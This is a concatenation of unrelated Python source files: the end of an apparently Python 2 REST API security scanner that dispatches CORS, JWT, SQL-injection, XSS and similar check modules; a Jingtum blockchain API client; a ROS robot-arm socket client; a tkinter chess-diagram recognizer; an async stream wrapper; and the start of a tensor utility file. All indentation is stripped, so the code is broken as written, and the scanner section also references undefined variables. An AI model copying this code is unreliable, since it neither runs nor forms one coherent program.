cookie_header = {'Cookie': cookie_dict['cookie']}
headers.update(cookie_header)
try:
custom_header = get_value('config.property','login','headers')
custom_header = ast.literal_eval(custom_header)
headers.update(custom_header)
except:
pass
return headers
def generate_report():
# Generating report once the scan is complete.
result = api_scan.generate_report()
if result is True:
print "%s[+]Report is generated successfully%s"% (api_logger.G, api_logger.W)
else:
print "%s[-]Failed to generate a report%s"% (api_logger.R, api_logger.W)
def read_scan_policy():
try:
scan_policy = get_value('scan.property','scan-policy','attack')
attack = ast.literal_eval(scan_policy)
except Exception as e:
print e
print "Failed to parse scan property file."
return attack
def update_scan_status(scanid, module_name=None, count=None):
#Update scanning status and total scan of module into DB.
time.sleep(3)
if count is not None:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {"total_scan" : count}})
else:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {module_name : "Y"}})
def modules_scan(url,method,headers,body,scanid=None):
'''Scanning API using different engines '''
attack = read_scan_policy()
if attack is None:
print "Failed to start scan."
sys.exit(1)
if scanid is not None:
count = 0
for key,value in attack.items():
if value == 'Y' or value =='y':
count += 1
print "Va",count,scanid
update_scan_status(scanid,"",count)
if attack['zap'] == "Y" or attack['zap'] == "y":
api_scan = zap_scan()
status = zap_start()
if status is True:
api_scan.start_scan(url,method,headers,body,scanid)
# Custom modules scan
if attack['cors'] == 'Y' or attack['cors'] == 'y':
cors_main(url,method,headers,body,scanid)
update_scan_status(scanid, "cors")
if attack['Broken auth'] == 'Y' or attack['Broken auth'] == 'y':
auth_check(url,method,headers,body,scanid)
update_scan_status(scanid, "auth")
if attack['Rate limit'] == 'Y' or attack['Rate limit'] == 'y':
rate_limit(url,method,headers,body,scanid)
update_scan_status(scanid, "Rate limit")
if attack['csrf'] == 'Y' or attack['csrf'] == 'y':
csrf_check(url,method,headers,body,scanid)
update_scan_status(scanid, "csrf")
if attack['jwt'] == 'Y' or attack['jwt'] == 'y':
jwt_check(url,method,headers,body,scanid)
update_scan_status(scanid, "jwt")
if attack['sqli'] == 'Y' or attack['sqli'] == 'y':
sqli_check(url,method,headers,body,scanid)
update_scan_status(scanid, "sqli")
if attack['xss'] == 'Y' or attack['xss'] == 'y':
xss_check(url,method,headers,body,scanid)
update_scan_status(scanid, "xss")
if attack['open-redirection'] == 'Y' or attack['open-redirection'] == 'y':
open_redirect_check(url,method,headers,body,scanid)
update_scan_status(scanid, "open-redirection")
def validate_data(url,method):
''' Validate HTTP request data and return boolean value'''
validate_url = urlparse.urlparse(url)
http_method = ['GET','POST','DEL','OPTIONS','PUT']
if method in http_method and bool(validate_url.scheme) is True:
validate_result = True
else:
validate_result = False
return validate_result
def scan_single_api(url, method, headers, body, api, scanid=None):
''' This function deals with scanning a single API. '''
if headers is None or headers == '':
headers = {'Content-Type' : 'application/json'}
if type(headers) is not dict:
headers = ast.literal_eval(headers)
if method == '':
method = 'GET'
result = validate_data(url, method)
if result is False:
print "[-]Invalid Arguments"
return False
p = Process(target=modules_scan,args=(url,method,headers,body,scanid),name='module-scan')
p.start()
if api == "Y":
return True
def scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require):
''' Scan API through different engines '''
if collection_type and collection_name is not None:
parse_collection(collection_name,collection_type)
if login_require is True:
api_login.verify_login(parse_data.api_lst)
msg = True
for data in parse_data.api_lst:
try:
url = data['url']['raw']
except:
url = data['url']
headers,method,body = data['headers'],data['method'],''
if headers:
try:
headhers = add_headers(headers)
except:
pass
if data['body'] != '':
body = json.loads(base64.b64decode(data['body']))
modules_scan(url,method,headers,body,scanid)
else:
print "%s [-]Invalid Collection. Please recheck collection Type/Name %s" %(api_logger.G, api_logger.W)
#generate_report()
def get_arg(args=None):
parser = argparse.ArgumentParser(description='REST API Security testing Framework')
parser.add_argument('-c', '--collection_type',
help='Type of API collection',
default='Postman',choices=('Postman', 'Swagger'))
parser.add_argument('-n', '--collection_name',
help='Type of API collection')
parser.add_argument('-u', '--url',
help='URL of target API')
parser.add_argument('-headers', '--headers',
help='Custom headers.Example: {"token" : "123"}')
parser.add_argument('-method', '--method',
help='HTTP request method',
default='GET',choices=('GET', 'POST'))
parser.add_argument('-b', '--body',
help='Request body of API')
parser.add_argument('-l', '--loginurl',
help='URL of login API')
parser.add_argument('-H', '--loginheaders',
help='Headers should be in a dictionary format. Example: {"accesstoken" : "axzvbqdadf"}')
parser.add_argument('-d', '--logindata',
help='login data of API')
results = parser.parse_args(args)
if len(args) == 0:
print "%sAt least one argument is needed to procced.\nFor further information check help: %spython astra.py --help%s"% (api_logger.R, api_logger.G, api_logger.W)
sys.exit(1)
return (results.collection_type,
results.collection_name,
results.url,
results.headers,
results.method,
results.body,
results.loginurl,
results.loginheaders,
results.logindata,
)
def main():
collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata = get_arg(sys.argv[1:])
if loginheaders is None:
loginheaders = {'Content-Type' : 'application/json'}
if collection_type and collection_name and loginurl and loginmethod and logindata:
# Login data is given as an input.
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and loginurl:
# This will first find the given loginurl from collection and it will fetch auth token.
parse_collection(collection_name,collection_type)
try:
loginurl,lognheaders,loginmethod,logidata = api_login.parse_logindata(loginurl)
except:
print "[-]%s Failed to detect login API from collection %s " %(api_logger.R, api_logger.W)
sys.exit(1)
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif loginurl and loginmethod:
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url:
if headers is None:
headers = {'Content-Type' : 'application/json'}
if method is None:
method = "GET"
login_require = False
else:
login_require = True
if body:
body = ast.literal_eval(body)
# Configuring ZAP before starting a scan
get_auth = get_value('config.property','login','auth_type')
if collection_type and collection_name is not None:
scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require)
else:
scan_single_api(url, method, headers, body, "False")
if __name__ == '__main__':
api_login = APILogin()
parse_data = PostmanParser()
api_logger = logger()
api_logger.banner()
main()
|
server.py | # -*- coding:utf-8 -*-
"""
* Copyright@2016 Jingtum Inc. or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
from websocket import create_connection
import threading
import json
import unirest
import urllib2
#import urllib.parse
import urlparse
#from urllib.error import HTTPError
from urllib2 import HTTPError
import json
import uuid
import urllib
import socket
from logger import logger
from config import Config
g_test_evn = False
class JingtumRESTException(Exception):
pass
class TumApiException(Exception):
pass
class Server(Config):
def __init__(self):
super(Server, self).__init__()
global g_test_evn
self.setTest(g_test_evn)
def setTest(self, isTest = False):
global g_test_evn
g_test_evn = isTest
self.isTest = isTest
if isTest:
self.api_version = Config.test_api_version
self.url = Config.test_api_address
self.ws_address = Config.test_web_socket_address
self.tt_address = Config.test_ttong_address
else:
self.api_version = Config.sdk_api_version
self.url = Config.sdk_api_address
self.ws_address = Config.sdk_web_socket_address
self.tt_address = Config.ttong_address
def setMode(self, is_Test):
self.setTest(is_Test)
class APIServer(Server):
def __init__(self):
super(APIServer, self).__init__()
pass
def getasyn(self, path, parameters=None, method="GET", callback=None, cb_para=None):
def get_cb(response):
callback(response.body, cb_para)
path = '/{version}/{path}'.format(version=self.api_version, path=path)
url = "%s%s"%(self.url, path)
if parameters:
parameters = {k:v for k,v in parameters.items() if v is not None}
for k, v in parameters.items():
if type(v) is bool:
parameters[k] = 'true' if v else 'false'
parameters = urllib.urlencode(parameters)
parameters = urllib.unquote(parameters)
print ("in _request:" + str(url))
print ("in _request:" + str(parameters))
unirest.get(url, headers={"Content-Type": "application/json;charset=utf-8"},
params=parameters, callback=get_cb)
def get(self, path, parameters=None, method="GET"):
path = '/{version}/{path}'.format(version=self.api_version, path=path)
if parameters:
parameters = {k:v for k,v in parameters.items() if v is not None}
for k, v in parameters.items():
if type(v) is bool:
parameters[k] = 'true' if v else 'false'
parameters = urllib.urlencode(parameters)
parameters = urllib.unquote(parameters)
pieces = (self.url, path, parameters, None)
url = "%s%s?%s"%(self.url, path, parameters)
#logger.debug("in _request:" + str(url))
print ("in _request:" + str(url))
req = urllib2.Request(url)
if method is not None:
req.get_method = lambda:method
try:
response = urllib2.urlopen(req, timeout=10)
realsock = response.fp._sock.fp._sock
res = json.loads(response.read().decode('utf-8'))
realsock.close()
response.close()
except HTTPError as e:
error_object = e.read()
if e.code == 400:
return json.loads(error_object.decode('utf-8'))
else:
raise JingtumRESTException(error_object)
if res['success']:
#del response['success']
return res
else:
raise JingtumRESTException(res['message'])
def postasyn(self, path, data=None, method="POST", callback=None):
def post_cb(response):
callback(response.body)
path = '/{version}/{path}'.format(version=self.api_version, path=path)
url = "%s%s"%(self.url, path)
data = json.dumps(data).encode('utf-8')
print ("in _request:" + str(url))
print ("in _request:" + str(data))
if method == "DELETE":
unirest.delete(url, headers={"Content-Type": "application/json;charset=utf-8"},
params=data, callback=post_cb)
else:
unirest.post(url, headers={"Content-Type": "application/json;charset=utf-8"},
params=data, callback=post_cb)
def post(self, path, data=None, method="POST", callback=None):
"""Make an HTTP request to the server
Encode the query parameters and the form data and make the GET or POST
request
:param path: The path of the HTTP resource
:param parameters: The query parameters
:param data: The data to be sent in JSON format
:param secret: The secret key, which will be added to the data
:param complete_path: Do not prepend the common path
:returns: The response, stripped of the 'success' field
:raises JingtumRESTException: An error returned by the rest server
"""
path = '/{version}/{path}'.format(version=self.api_version, path=path)
url = "%s%s"%(self.url, path)
#logger.debug("in _request:" + str(url))
print ("in _request:" + str(url))
#req = urllib.request.Request(url)
req = urllib2.Request(url)
if method is not None:
req.get_method = lambda:method
if data is not None:
req.add_header("Content-Type","application/json;charset=utf-8")
data = json.dumps(data).encode('utf-8')
try:
#logger.debug("in _request:" + str(data))
print ("in _request:" + str(data))
response = urllib2.urlopen(req, data, timeout=10)
realsock = response.fp._sock.fp._sock
res = json.loads(response.read().decode('utf-8'))
realsock.close()
response.close()
except HTTPError as e:
#error_object = json.loads(e.read().decode('utf-8'))['message']
error_object = e.read()
raise JingtumRESTException(error_object)
#####print "in _request", path, response
if res['success']:
#del response['success']
if callback is None:
return res
else:
callback(res)
else:
raise JingtumRESTException(res['message'])
def delete(self, path, data=None, method="DELETE"):
return self.post(path, data, method)
class TumServer(Server):
def __init__(self):
super(TumServer, self).__init__()
pass
def send(self, path, data=None, method="POST"):
# if parameters:
# parameters = {k:v for k,v in parameters.items() if v is not None}
# for k, v in parameters.items():
# if type(v) is bool:
# parameters[k] = 'true' if v else 'false'
# parameters = urllib.urlencode(parameters)
# parameters = urllib.unquote(parameters)
# pieces = (self.url, path, parameters, None)
# url = urlparse.urlunsplit(pieces)
url = path
#logger.debug("in _request:" + str(url))
print "in _request:" + str(url)
req = urllib2.Request(url)
if method is not None:
req.get_method = lambda:method
if data is not None:
req.add_data(urllib.urlencode(data))
req.add_header("Content-Type", "application/x-www-form-urlencoded")
try:
#logger.debug("in _request:" + str(data))
print "in _request:" + str(data)
response = urllib2.urlopen(req, timeout=10)
realsock = response.fp._sock.fp._sock
res = json.loads(response.read().decode('utf-8'))
realsock.close()
response.close()
except HTTPError as e:
error_object = e.read()
if e.code == 400:
return json.loads(error_object.decode('utf-8'))
else:
#print "ddddddd", e.__dict__
raise TumApiException(error_object)
return res
class WebSocketServer(Server):
def __init__(self):
super(WebSocketServer, self).__init__()
self._shutdown = False
self.ws = create_connection(self.ws_address)
#print self.ws.recv()#, self.ws.__dict__
# def __del__(self):
# print "WebSocketClient __del__", self.close()
def send(self, data):
ret = None
data = json.dumps(data).encode('utf-8')
try:
self.ws.send(data)
#ret = self.ws.recv()
#ret = json.loads(ret.decode('utf-8'))
except Exception, e:
print "websocket send error", e
return ret
def subscribe(self, address, secret):
_data = {
"command": "subscribe",
"account": address,
"secret": secret
}
ret = self.send(_data)
return ret
def unsubscribe(self, address):
_data = {
"command": "unsubscribe",
"account": address,
}
ret = self.send(_data)
return ret
def close(self):
_data = {
"command": "close",
}
self._shutdown = True
return self.send(_data)
def setTxHandler(self, callback, *arg):
t = threading.Thread(target=self.receive, args=(callback, arg))
t.setDaemon(True)
t.start()
def receive(self, callback, *arg):
try:
while not self._shutdown:
msg = json.loads(self.ws.recv().decode('utf-8'))
#print 'websocket<<<<<<<< receiving % s', json.dumps(msg, indent=2)
callback(msg, arg)
except Exception, e:
print e
|
Hiwin_RT605_ArmCommand_Socket_20190627204210.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
Socket.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
#Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
Application.py | ################################################################################
# Main application
################################################################################
import queue
import threading
from os.path import abspath, dirname, join
import tkinter as tk
from PIL import Image, ImageTk, ImageOps, UnidentifiedImageError
import cv2 as cv
import numpy as np
import tensorflow as tf
from tensorflow import keras
import sys
sys.path.insert(0, join(abspath(dirname(__file__)), "..\tools"))
from detection import get_diagram_position
from relative_to_absolute_path import get_absolute_path
from diagrams_to_squares import get_squares
################################################################################
################################################################################
def load_pieces() -> dict:
return {
4: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\bB.png", __file__)).resize((70, 70))
),
6: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\bK.png", __file__)).resize((70, 70))
),
3: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\bN.png", __file__)).resize((70, 70))
),
1: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\bP.png", __file__)).resize((70, 70))
),
5: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\bQ.png", __file__)).resize((70, 70))
),
2: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\bR.png", __file__)).resize((70, 70))
),
10: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\wB.png", __file__)).resize((70, 70))
),
12: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\wK.png", __file__)).resize((70, 70))
),
9: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\wN.png", __file__)).resize((70, 70))
),
7: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\wP.png", __file__)).resize((70, 70))
),
11: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\wQ.png", __file__)).resize((70, 70))
),
8: ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\pieces\wR.png", __file__)).resize((70, 70))
),
}
################################################################################
################################################################################
class ProcessImage:
def __init__(self, a_queue):
self.a_queue = a_queue
self.black_model = keras.models.load_model(
get_absolute_path("..\resources\black_model.h5", __file__)
)
self.white_model = keras.models.load_model(
get_absolute_path("..\resources\white_model.h5", __file__)
)
def process(self, np_image):
np_diagram = get_diagram_position(np_image)
# is a diagram large enough
if np_diagram.shape[0] * 5 < np_image.shape[0] or np_diagram.shape[1] * 5 < np_image.shape[1]:
print("No diagram")
return None
result = []
black_squares, white_squares = get_squares(np_diagram)
for image, i, j in black_squares:
image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
square = cv.resize(image_gray, (32, 32)) / 255.0
y_prob = self.black_model.predict(square.reshape(1, 32, 32, 1))
y_classes = y_prob.argmax(axis=-1)
if y_classes[0] != 0:
result.append((i, j, y_classes[0]))
for image, i, j in white_squares:
image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
square = cv.resize(image_gray, (32, 32)) / 255.0
y_prob = self.white_model.predict(square.reshape(1, 32, 32, 1))
y_classes = y_prob.argmax(axis=-1)
if y_classes[0] != 0:
result.append((i, j, y_classes[0]))
self.a_queue.put_nowait(result)
################################################################################
################################################################################
class ChessBoard(tk.Frame):
def __init__(self, root, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.canvas = tk.Canvas(self, width=560, height=560)
self.canvas.place(x=20, y=20)
self.board_image = ImageTk.PhotoImage(
Image.open(get_absolute_path("..\resources\board.jpg", __file__)).resize((560, 560))
)
self.canvas.create_image(0, 0, image=self.board_image, anchor=tk.NW)
self.pieces = load_pieces()
self.showed_pieces = []
def clear_board(self):
for piece_ref in self.showed_pieces:
self.canvas.delete(piece_ref)
self.showed_pieces = []
def set_piece(self, i, j, piece_id):
piece_ref = self.canvas.create_image(i * 70, j * 70, image=self.pieces[piece_id], anchor=tk.NW)
self.showed_pieces.append(piece_ref)
################################################################################
################################################################################
class LeftSide(tk.Frame):
def __init__(self, root, chess_board, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.camera_button = tk.Button(self, text="Open camera", command=self.show_frame)
self.camera_button.place(x=50, y=20)
self.browse_button = tk.Button(self, text="Browse file", command=self.show_image)
self.browse_button.place(x=200, y=20)
self.image_on_canvas = None
self.canvas = tk.Canvas(self, width=450, height=450)
self.canvas.place(x=50, y=100)
self.cv_video_capture = None
self.video_camera_on = False
self.chess_board = chess_board
self.a_queue = queue.Queue()
self.process_image = ProcessImage(self.a_queue)
self.thread = None
def show_frame(self):
self.video_camera_on = True
self.show_video_frame()
def show_video_frame(self, counter=1):
if not self.video_camera_on:
return
if not self.cv_video_capture:
self.cv_video_capture = cv.VideoCapture(0)
self.cv_video_capture.set(cv.CAP_PROP_FRAME_WIDTH, 450)
self.cv_video_capture.set(cv.CAP_PROP_FRAME_HEIGHT, 450)
_, frame = self.cv_video_capture.read()
# frame = cv.flip(frame, 1)
cv2image = cv.cvtColor(frame, cv.COLOR_BGR2RGBA)
if counter == 1:
self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
self.thread.start()
elif not self.a_queue.empty():
self.show_pieces(self.a_queue.get(0))
self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
self.thread.start()
image = Image.fromarray(cv2image)
image_tk = ImageTk.PhotoImage(image=image)
self.canvas.delete(tk.ALL)
self.canvas.image_tk = image_tk
self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
if self.cv_video_capture:
self.canvas.after(20, self.show_video_frame, counter + 1)
def show_image(self):
self.video_camera_on = False
if self.cv_video_capture:
self.cv_video_capture = self.cv_video_capture.release()
self.canvas.delete(tk.ALL)
from tkinter import filedialog
file_path = filedialog.askopenfilename(title="Select file")
if file_path:
try:
image = Image.open(file_path)
self.process_image.process(np.array(image)[..., :3])
self.show_pieces(self.a_queue.get(0))
image_tk = ImageTk.PhotoImage(image.resize((450, 450)))
self.canvas.image_tk = image_tk
self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
except UnidentifiedImageError:
pass
def show_pieces(self, pieces):
self.chess_board.clear_board()
for i, j, piece_id in pieces:
self.chess_board.set_piece(i, j, piece_id)
################################################################################
################################################################################
class Application(tk.Frame):
def __init__(self, root, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.root = root
self.root.title("Chess Diagram Recognition")
self.chess_board = ChessBoard(self.root, height=600, width=600)
self.chess_board.place(x=600, y=0)
self.left_side = LeftSide(
self.root,
self.chess_board,
height=600,
width=600
)
self.left_side.place(x=0, y=0)
################################################################################
################################################################################
def main():
root = tk.Tk()
root.bind("<Escape>", lambda e: root.quit())
Application(root)
root.minsize(height=600, width=1200)
root.maxsize(height=600, width=1200)
root.mainloop()
################################################################################
################################################################################
main()
|
aiostream.py | # Copyright 2020 Josh Pieper, jjp@pobox.com.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''This wraps a python file-like object in an asynchronous file-like
object for use in coroutines. It uses threads for maximum
portability, although not necessarily the best performance.'''
import asyncio
import queue
import threading
from typing import List, Optional, Union
async def _async_set_future(fut, value):
if fut.done():
# We must have been canceled.
return
fut.set_result(value)
def _run_queue(q):
while True:
try:
# We use a timeout just so things like
# KeyboardInterrupt can fire.
item = q.get(block=True, timeout=0.05)
item()
except queue.Empty:
pass
class AioStream:
def __init__(self, fd):
self.fd = fd
self._write_data = b''
self._read_queue = queue.Queue()
self._write_queue = queue.Queue()
self._read_lock = threading.Lock()
self._write_lock = threading.Lock()
self._read_thread = threading.Thread(
target=self._read_child, daemon=True)
self._read_thread.start()
self._write_thread = threading.Thread(
target=self._write_child, daemon=True)
self._write_thread.start()
async def read(self, size: int = 1, block=True) -> bytes:
loop = asyncio.get_event_loop()
remaining = size
accumulated_result = b''
while True:
f = loop.create_future()
skip = [False]
def do_read():
# This will run in the background thread.
with self._read_lock:
if skip[0]:
return
result = self.fd.read(remaining)
asyncio.run_coroutine_threadsafe(_async_set_future(f, result), loop)
self._read_queue.put_nowait(do_read)
try:
this_round = await f
except asyncio.CancelledError:
with self._read_lock:
skip[0] = True
raise
accumulated_result += this_round
remaining -= len(this_round)
if not block or remaining == 0:
return accumulated_result
def write(self, data: Union[bytearray, bytes, memoryview]) -> int:
self._write_data += data
async def drain(self, ) -> int:
self._write_data, write_data = b'', self._write_data
loop = asyncio.get_event_loop()
f = loop.create_future()
skip = [False]
def do_write():
with self._write_lock:
if skip[0]:
return
self.fd.write(write_data)
asyncio.run_coroutine_threadsafe(_async_set_future(f, True), loop)
self._write_queue.put_nowait(do_write)
try:
result = await f
except asyncio.CancelledError:
with self._write_lock:
skip[0] = True
raise
def _read_child(self):
_run_queue(self._read_queue)
def _write_child(self):
_run_queue(self._write_queue)
|
tensor.py | from collections import OrderedDict
from contextlib import contextmanager
from typing import Dict, List, Tuple
import subprocess
import time
import numpy as np
import logging
logger = logging.getLogger(__name__)
from torch import Tensor
from torch.cuda.amp import GradScaler, autocast
from torch.multiprocessing import Process
import torch
from paragen.utils.io import wait_until_exist
from paragen.utils.ops import recursive
from paragen.utils.runtime import Environment, singleton
def list2tensor(x):
if isinstance(x, Dict):
return {k: list2tensor(v) for k, v in x.items()}
elif isinstance(x, List):
_x = get_example_obj(x)
return create_tensor(x, type(_x))
else:
return x
def convert_idx_to_tensor(idx, pad, ndim=None):
"""
Convert a nd list of indices to a torch tensor
Args:
idx: a nd list of indices
pad: padding index
ndim: dimension for idx
Returns:
- indices in torch tensor
"""
max_lengths = maxlen(idx, ndim=ndim)
tensor_type = type(pad)
ndim = len(max_lengths)
